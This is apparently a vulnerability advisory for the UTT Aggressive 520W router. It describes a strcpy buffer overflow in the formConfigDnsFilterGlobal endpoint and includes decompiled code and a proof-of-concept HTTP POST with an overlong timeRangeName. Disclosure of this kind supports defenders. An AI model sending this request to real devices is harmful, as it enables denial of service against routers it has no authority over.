### Key Vulnerability Information - **Vendor of the Products**: UTT - **Affected Product**: Aggressive 520W Router - **Affected Firmware Version**: <=v3v1.7.7-180627 #### Overview The UTT Aggressive 520W router contains a critical buffer overflow vulnerability. An attacker can exploit this by manipulating parameters through the `/goform/formConfigDnsFilterGlobal` endpoint, triggering a buffer overflow. This can lead to a denial-of-service condition via the following vulnerable code: ```c strcpy((char *)(InstPointByName + 20), Var); ``` #### Vulnerability Details The function `formDefineDnsFilter()` contains the vulnerable API call: ```c websFormDefine((int)"formConfigDnsFilterGlobal", (int)sub_428044); ``` When the `sourceIP` parameter is set to `ipRange`, the code enters an `if` block where the `timeRangeName` input is not properly bounds-checked, resulting in a buffer overflow: ```c if ( !strcmp(v6, "ipRange") ) { *((_DWORD *)(InstPointByIndex + 108)) = 1; if ( !strcmp(v6, "ipRange") ) goto LABEL_6; LABEL_8: *((_DWORD *)(InstPointByIndex + 112)) = 0; *((_DWORD *)(InstPointByIndex + 116)) = v11; *((_DWORD *)(InstPointByIndex + 120)) = v12; strcpy((char *)(InstPointByIndex + 137), src_1); if ( !strcmp(v8, ACCEPT) ) goto LABEL_9; goto LABEL_13; } ``` #### Proof of Concept (PoC) ```http POST /goform/formConfigDnsFilterGlobal HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri: Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/* Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788 Connection: close sourceIP=ipRange&timeRangeName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ```